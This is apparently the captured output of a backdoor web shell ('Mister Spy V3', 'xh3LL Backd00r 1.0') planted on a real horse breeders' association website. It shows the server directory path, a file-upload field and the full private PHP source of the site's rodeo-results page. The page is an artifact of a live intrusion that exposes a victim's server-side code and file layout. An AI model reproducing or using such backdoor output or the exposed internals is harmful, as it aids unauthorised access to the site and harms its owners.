Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/public_html/espanol/
Upload File :
Current File : /home/caballoscriollos/public_html/espanol/rodeos_resultados.php

<?php
require_once('inc_library.php');

$IdEvento = intval($_REQUEST['IdEvento']);

$oEventos 									= new Eventos();
$EventosFuncionalesPruebas					= new EventosFuncionalesPruebas();
$EventosFuncionalesPruebasCategorias		= new EventosFuncionalesPruebasCategorias();
$oEventosFuncionalesPruebasEventos 			= new EventosFuncionalesPruebasEventos();
$oInscripciones								= new Inscripciones();
$oInscripcionesAnimalesPruebasFuncionales	= new InscripcionesAnimalesPruebasFuncionales();
$oInscripcionResultadosRodeos				= new InscripcionResultadosRodeos();
$oJinetes									= new Jinetes();
$Pdres 										= new Pdres();
$Extrs										= new Extrs();
$Exiss 										= new Exiss();
$oInspecciones								= new Inspecciones();

$oEvento = $oEventos->GetById($IdEvento);

$arrEventosFuncionalesPruebasEventos = $oEventosFuncionalesPruebasEventos->GetAllByPruebaEvento($IdEvento, 2); //Busco solo los de rodeo



?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/base_espanol.dwt.php" codeOutsideHTMLIsLocked="false" -->

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<!-- InstanceBeginEditable name="doctitle" -->
<title>Asociaci&oacute;n Criadores de Caballos Criollos</title>
<!-- InstanceEndEditable -->
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="../css/basico_frontend.css" rel="stylesheet" type="text/css" />
<style type="text/css">
<!--
#Institucional {
	position:absolute;
	width:119px;
	height:33;
	z-index:1;
	left: 456px;
	top: 324px;
	visibility: visible;
}
#SubInstitucional {
	position:absolute;
	width:127;
	height:2px;
	z-index:1;
	top: 39px;
	left: -17px;
}
#Formulario {
	position:absolute;
	width:124;
	height:33;
	z-index:2;
	visibility: visible;
}
#SubFormulario {
	position:absolute;
	width:129;
	height:11px;
	z-index:1;
	top: 22px;
	left: 31px;
	visibility: hidden;
}
#Ranking {
	position:absolute;
	width:168px;
	height:34px;
	z-index:2;
	visibility: visible;
}
#Subranking {
	position:absolute;
	width:129;
	height:115px;
	z-index:1;
	top: 23px;
	left: -6px;
	visibility: hidden;
}
#Clasificatoria {
	position:absolute;
	width:114px;
	height:34px;
	z-index:3;
	visibility: visible;
}
#SubClasificatoria {
	position:absolute;
	width:118px;
	height:115px;
	z-index:4;
	left: 16px;
	top: 23px;
	visibility: hidden;
}
#Premios {
	position:absolute;
	width:79px;
	height:32px;
	z-index:4;
	visibility: visible;
}
#SubPremios {
	position:absolute;
	width:80px;
	height:22px;
	z-index:5;
	top: 23px;
	visibility: hidden;
	left: 13px;
}
#Institucional {
	position:absolute;
	width:236px;
	height:24px;
	z-index:5;
}
#Institucional {
	position:absolute;
	width:200px;
	height:115px;
	z-index:5;
}
#Institucional {
	position:absolute;
	width:200px;
	height:115px;
	z-index:5;
}
#institucional {
	position:absolute;
	width:178;
	height:19;
	z-index:9;
	visibility: visible;
}
#subinstitucional {
	position:absolute;
	width:130px;
	height:115px;
	z-index:1;
	visibility: hidden;
	top: 0px;
	left: 150px;
}
#reglamentos {
	position:absolute;
	width:178;
	height:20;
	z-index:6;
	visibility: visible;
}
#subregalmentos {
	position:absolute;
	width:129px;
	height:115px;
	z-index:7;
	left: 150px;
	top: 0;
	visibility: hidden;
}
#Galeria {
	position:absolute;
	width:237;
	height:19;
	z-index:8;
	visibility: visible;
}
#subGaleria {
	position:absolute;
	width:129;
	height:51px;
	z-index:1;
	left: 170;
	visibility: visible;
	top: 0;
}
#galeria {
	position:absolute;
	width:237;
	height:19;
	z-index:8;
	visibility: visible;
}
#subgaleria {
	position:absolute;
	width:129;
	height:69;
	z-index:1;
}
#Layer1 {
	position:absolute;
	width:200px;
	height:115px;
	z-index:7;
}
#galeria {
	position:absolute;
	width:178;
	height:19;
	z-index:8;
}
#subgaleria {
	position:absolute;
	width:131px;
	height:60;
	z-index:1;
	visibility: hidden;
	left: 150px;
	top: 0px;
}

-->
</style>
<script type="text/JavaScript">
<!--
function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_showHideLayers() { //v6.0
  var i,p,v,obj,args=MM_showHideLayers.arguments;
  for (i=0; i<(args.length-2); i+=3) if ((obj=MM_findObj(args[i]))!=null) { v=args[i+2];
    if (obj.style) { obj=obj.style; v=(v=='show')?'visible':(v=='hide')?'hidden':v; }
    obj.visibility=v; }
}
//-->

function MostrarDetalle(Id) {
	var tr = Get('tr_' + Id);
	var link = Get('link_' + Id);
	
	if (tr.style.display == 'none')
	{
		tr.style.display = '';
		link.innerHTML = '[Ocultar]';
	}
	else
	{
		tr.style.display = 'none';
		link.innerHTML = '[Ver m&aacute;s]';
	}
	
}
</script>
<!-- Global site tag (gtag.js) - Google Analytics -->

<script async src="https://www.googletagmanager.com/gtag/js?id=UA-112666274-1"></script>

<script>

  window.dataLayer = window.dataLayer || [];

  function gtag(){dataLayer.push(arguments);}

  gtag('js', new Date());

 

  gtag('config', 'UA-112666274-1');

</script>
</head>

<body>
<div align="center"><?php include("ssi_cabezal.php"); ?></div>
<table width="942" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td width="20" class="FondoBlanco"><div align="center"></div></td>
    <td><div align="center"><!-- InstanceBeginEditable name="Flash" --><!-- InstanceEndEditable --></div></td>
    <td width="20" class="FondoBlanco"><div align="center"></div></td>
  </tr>
</table>
<?php include("ssi_botonera_nueva.php"); ?>
<table width="942" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td width="20" height="20" class="FondoBlanco">&nbsp;</td>
    <td height="20" class="FondoBlanco">&nbsp;</td>
    <td width="20" height="20" class="FondoBlanco">&nbsp;</td>
  </tr>
  <tr>
    <td width="20" class="FondoBlanco">&nbsp;</td>
    <td class="FondoBlanco"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
      <tr>
        <td valign="top"><!-- InstanceBeginEditable name="Contenido" -->
          <table width="100%" border="0" cellspacing="0" cellpadding="0">
            <tr>
              <td background="images/accc_fondo_botonera.png"><table width="100%" height="20" border="0" cellpadding="0" cellspacing="0">
                  <tr valign="middle">
                    <td width="10" height="31">&nbsp;</td>
                    <td height="31" class="TituloPrincipal">RESULTADOS RODEOS - <?= $oEvento->Denominacion ?></td>
                    <td height="31"><div align="right"><a href="javascript:history.back();" class="linkBlanco">[volver]</a></div></td>
                    <td width="10" height="31" class="TituloPrincipal"><div align="right"></div></td>
                  </tr>
              </table></td>
            </tr>
            <tr>
              <td>&nbsp;</td>
            </tr>
            <tr>
              <td height="5"><div align="center">
               <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
				
				<tr class="bordeGrisFondo">
	  		
		  
		    
	  </tr>
	  
	  <?php
	  foreach ($arrEventosFuncionalesPruebasEventos as $oEventoFuncionalPruebaEvento) 
	  {
	  		if ($oEventoFuncionalPruebaEvento->Clasificacion == 'TercioFinal')
				$CantidadMaximoVacas = 25;
			else
				$CantidadMaximoVacas = 24;
		  $CantidadClasificados = $oEventoFuncionalPruebaEvento->CantidadClasificatoria;
		  
		  $Categoria = $EventosFuncionalesPruebasCategorias->GetById($oEventoFuncionalPruebaEvento->IdEventosFuncionalesPruebasCategoria);
		  
		  $arrInscripcionesAnimalesPruebasFuncionales = $oInscripcionesAnimalesPruebasFuncionales->GetAllByIdEventosFuncionalesPruebasCategoriaEventoRodeosOrdenado($oEventoFuncionalPruebaEvento->IdEventosFuncionalesPruebasCategoria, $IdEvento);
		  if ($arrInscripcionesAnimalesPruebasFuncionales)
		  {
	  ?>
	  <tr>
	  	<td height="20"><span class="tituloNoticia">PRUEBA RODEOS - CATEGORIA "<?= $Categoria->Nombre ?>"</span></td>
	  </tr>
	  <tr>
	  	<td height="20"><span class="tituloNoticia">FECHA: <?= str_replace('-', '/', CambiarFecha($oEvento->EventoDesdeFecha)) ?></span></td>
	  </tr>
	  <tr>
	  	<td height="20"><span class="tituloNoticia">TIPO DE EVENTO: <?= strtoupper($oEventoFuncionalPruebaEvento->Clasificacion) ?></span></td>
	  </tr>
	  <tr>
	  	<td>&nbsp;</td>
	  </tr>
	  <tr>
	  	<td>
	  		<table border="0" width="100%" cellpadding="0" cellspacing="0" class="bordeGris">
	  			<tr class="bordeGrisFondo">	
					<td height="25" width="5">&nbsp;</td>
					<td align="center"><div style="text-align:center" id="margen">&nbsp;</div></td>
					<td><div style="text-align:center" id="margen"><strong>SBA</strong></div></td>
					<td><div style="text-align:center" id="margen"><strong>RP</strong></div></td>
					<td><div id="margen"><strong>Animal</strong></div></td>
					<td><div id="margen"><strong>Jinete</strong></div></td>
					<td><div style="text-align:center" id="margen"><strong>ADN</strong></div></td>
					<td><div style="text-align: center" id="margen"><strong>Aprob</strong></div></td>
					<td><div style="text-align:center" id="margen"><strong>Puntos</strong></div></td>
					<td><div style="text-align:center" id="margen">&nbsp;</div></td>
					<td width="5">&nbsp;</td>	  
				</tr>
	  <?php
	  		$Contador = 0;
			$arrIdYunta = array();
	  		foreach ($arrInscripcionesAnimalesPruebasFuncionales as $oInscripcionAnimalPruebaFuncional)
	  		{
	  			$oInscripcion = $oInscripciones->GetById($oInscripcionAnimalPruebaFuncional->IdInscripcion);
				if (!$oInscripcionAnimalPruebaFuncional->YuntaIdAnimal)
					$arrIdYunta[] = $oInscripcion->IdAnimal;
				if (!in_array($oInscripcion->IdAnimal, $arrIdYunta))
				{
					$arrIdYunta[] = $oInscripcionAnimalPruebaFuncional->YuntaIdAnimal;
					$oInscripcionYunta = $oInscripcionesAnimalesPruebasFuncionales->GetByIdEventoPruebaCategoriaIdAnimal($IdEvento, $oInscripcionAnimalPruebaFuncional->IdEventosFuncionalesPrueba, $oInscripcionAnimalPruebaFuncional->IdEventosFuncionalesPruebasCategoria, $oInscripcionAnimalPruebaFuncional->YuntaIdAnimal);
				
					$oResultado = $oInscripcionResultadosRodeos->GetByIdInscripcionesAnimalesPruebasFuncional($oInscripcionAnimalPruebaFuncional->IdInscripcionesAnimalesPruebasFuncional);
					$oJinete = $oJinetes->GetById($oInscripcionAnimalPruebaFuncional->IdJinete);
					$oJineteY = $oJinetes->GetById($oInscripcionYunta->IdJinete);
					if (!$oJineteY)
						$JineteY = $oInscripcionYunta->Jinete;
					else
						$JineteY = $oJineteY->Nombre . ' ' . $oJineteY->Apellido;
					
					if (!$oJinete)
						$Jinete = $oInscripcionAnimalPruebaFuncional->Jinete;
					else
						$Jinete = $oJinete->Nombre . ' ' . $oJinete->Apellido;
						
					$oInspeccion = $oInspecciones->GetByIdAnimal($oInscripcion->IdAnimal);
					$oInspeccionY = $oInspecciones->GetByIdAnimal($oInscripcionAnimalPruebaFuncional->YuntaIdAnimal);
																			
					$oInscripcionAnimalYunta = $oInscripciones->GetById($oInscripcionYunta->IdInscripcion);
					
					if ($oInscripcionAnimalYunta->Tabla != '')
					{
						switch ( $oInscripcionAnimalYunta->Tabla )
						{
							case 'IdPdre':
								$oCaballo 	= $Pdres->GetByID($oInscripcionAnimalYunta->IdAnimal);
								$NombreY 	= $oCaballo->NOMB;
								$SbaY 		= $oCaballo->HBAE;
								$RpY		= $oCaballo->RPEX;
								break;

							case 'IdExis':
							
								$oCaballo 	= $Exiss->GetById($oInscripcionAnimalYunta->IdAnimal);
								$NombreY 	= $oCaballo->NOMB;
								$SbaY 		= $oCaballo->HBAE;
								$RpY		= $oCaballo->RPEX;
								break;

							case 'IdExtr':
								$oCaballo 	= $Extrs->GetById($oInscripcionAnimalYunta->IdAnimal);
								$NombreY 	= $oCaballo->NOMB;
								$SbaY 		= $oCaballo->HBAE;
								$RpY		= $oCaballo->RPEX;
								break;
						}
					}
					$dia1 = 0;
					for ($i = 1; $i <= 12; $i++)
					{
						$VacaDia = 'Vaca' . $i;
						$dia1+= $oResultado->$VacaDia;
					}
					$dia2 = 0;
					for ($i = 13; $i <= 24; $i++)
					{
						$VacaDia = 'Vaca' . $i;
						$dia2+= $oResultado->$VacaDia;
					}
	  ?>	  
	  			<tr <?= $Contador < $CantidadClasificados ? "bgColor='#f3f3f3'" : "" ?>>
	  				<td height="25" width="5">&nbsp;</td>
					<td rowspan="2" align="center"><div style="text-align:center" id="margen"><strong><?= $Contador + 1 ?></strong></div></td>
					<td><div style="text-align:center" id="margen"><?= $oInscripcion->Sba ?></div></td>
					<td><div style="text-align:center" id="margen"><?= $oInscripcion->Rp ?></div></td>
					<td><div id="margen"><?= $oInscripcion->Animal ?></div></td>
					<td><div id="margen"><?= $Jinete ?></div></td>
					<td><div id="margen" style="text-align:center">&nbsp;</div></td>
					<td><div id="margen" style="text-align:center"><?= $oInspeccion && $oInspeccion->Aprobado ? 'SI' : 'NO' ?></div></td>
					<td rowspan="2"><div id="margen" style="text-align: center"><strong><?= $oResultado->Total ?></strong></div></td>
					<td rowspan="2"><div id="margen" style="text-align: center"><a href="javascript: MostrarDetalle('<?= $oInscripcionAnimalPruebaFuncional->IdInscripcionesAnimalesPruebasFuncional ?>')" class="linkBasico">[Ver m&aacute;s]</a></div></td>
					<td width="5">&nbsp;</td>
	  			</tr>
	  			<tr <?= $Contador < $CantidadClasificados ? "bgColor='#f3f3f3'" : "" ?>>
	  				<td height="25" width="5">&nbsp;</td>
					<td><div style="text-align:center" id="margen"><?= $SbaY ?></div></td>
					<td><div style="text-align:center" id="margen"><?= $RpY ?></div></td>
					<td><div id="margen"><?= $NombreY ?></div></td>
					<td><div id="margen"><?= $JineteY ?></div></td>
					<td><div id="margen" style="text-align:center">&nbsp;</div></td>
					<td><div id="margen" style="text-align:center"><?= $oInspeccionY && $oInspeccionY->Aprobado ? 'SI' : 'NO' ?></div></td>
					<td width="3">&nbsp;</td>
	  			</tr>
	  			<tr>
					<td colspan="12"><div align="center">
						<table width="100%" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td style="border-top: 1px solid #666666"  height="1"><div align="center"></div></td>
							</tr>
						</tbody></table>
					</div></td>
				</tr>
	  			<tr id="tr_<?= $oInscripcionAnimalPruebaFuncional->IdInscripcionesAnimalesPruebasFuncional ?>" style="display: none">
	  				<td colspan="12">
	  					<table width="100%" border="0" cellpadding="0" cellspacing="0">
	  						<tr>
								<td colspan="15"><div align="center">
									<table width="100%" border="0" cellspacing="0" cellpadding="0">
										<tbody><tr>
											<td style="border-top: 1px solid #666666"  height="1"><div align="center"></div></td>
										</tr>
									</tbody></table>
								</div></td>
							</tr>
	  						<tr background="images/accc_fondo_botonera.png">
	  							<td colspan="14" height="25" align="center"><div style="color: #FFFFFF">
	  								<strong>PUNTAJE X VACA</strong></div>
	  							</td>
	  						</tr>
	  						<tr>
	  						
		  						<?php
		  						for ($i = 1; $i <= 12; $i++)
		  						{
		  						?>
		  							<td <?= $i % 2 == 0 ? ' class="bordeGrisFondo"' : '' ?> height="25" width="55" align="center"><strong>Vaca <?= $i ?></strong></td>
		  						<?php
		  							
		  						}
		  						?>
	  						</tr>
	  						<tr>
	  						
	  						<?php
	  						for ($i = 1; $i <= 12; $i++)
	  						{
	  							$Vaca = 'Vaca' . $i;
	  						?>
	  							<td <?= $i % 2 == 0 ? ' class="bordeGrisFondo"' : '' ?> height="25" align="center"><?= $oResultado->$Vaca ?></td>
	  						<?php
	  						}
	  						?>
	  						</tr>
	  						<tr>
	  						
		  						<?php
		  						for ($i = 13; $i <= 24; $i++)
		  						{
		  						?>
		  							<td <?= $i % 2 == 0 ? ' class="bordeGrisFondo"' : '' ?> height="25" width="55" align="center"><strong>Vaca <?= $i ?></strong></td>
		  						<?php
		  							
		  						}
		  						?>
	  						</tr>
	  						<tr>
	  						
	  						<?php
	  						for ($i = 13; $i <= 24; $i++)
	  						{
	  							$Vaca = 'Vaca' . $i;
	  						?>
	  							<td <?= $i % 2 == 0 ? ' class="bordeGrisFondo"' : '' ?> height="25" align="center"><?= $oResultado->$Vaca ?></td>
	  						<?php
	  						}
	  						?>
	  						</tr>
	  						<?php
	  						if ($CantidadMaximoVacas == 25)
	  						{
	  						?>
	  						<tr>
	  						
		  						<td height="25" width="5">&nbsp;</td>
		  							<td height="25" width="55" align="center"><strong>Morf.</strong></td>
		  						<td height="25" width="5">&nbsp;</td>
	  						</tr>
	  						<tr>
		  						<td height="25" width="5">&nbsp;</td>
	  							<td height="25" align="center"><?= $oResultado->Vaca27 ?></td>
	  							<td height="25" width="5">&nbsp;</td>
	  						</tr>
	  						<?php
	  						}
	  						?>
	  					</table>
	  				</td>
	  			</tr>
	  			<tr>
					<td colspan="20"><div align="center">
						<table width="100%" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td style="border-top: 1px solid #666666"  height="1"><div align="center"></div></td>
							</tr>
						</tbody></table>
					</div></td>
				</tr>
	  <?php	
					$Contador++;
				}
	  		}
	  ?>
	  	</table>
	  	</td>
	  </tr>
		<tr bgcolor="<? echo $CeldDivide;?>">
		<td colspan="3" bgcolor="<? echo $CeldDivide;?>"><div align="center"></div></td>
      </tr>
	  <?php
	  	} 
	  } 
	  ?>
	</table>
                </div>
            </tr>
            <tr>
              <td>&nbsp;</td>
            </tr>
          </table>
        <!-- InstanceEndEditable --></td>

        </tr>
    </table></td>
    <td width="20" class="FondoBlanco">&nbsp;</td>
  </tr>
  <tr>
    <td width="20" class="FondoBlanco">&nbsp;</td>
    <td class="FondoBlanco">&nbsp;</td>
    <td width="20" class="FondoBlanco">&nbsp;</td>
  </tr>
</table>
<?php include("ssi_pie.php"); ?>

<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-25020972-2']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>

</body>
<!-- InstanceEnd --></html>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat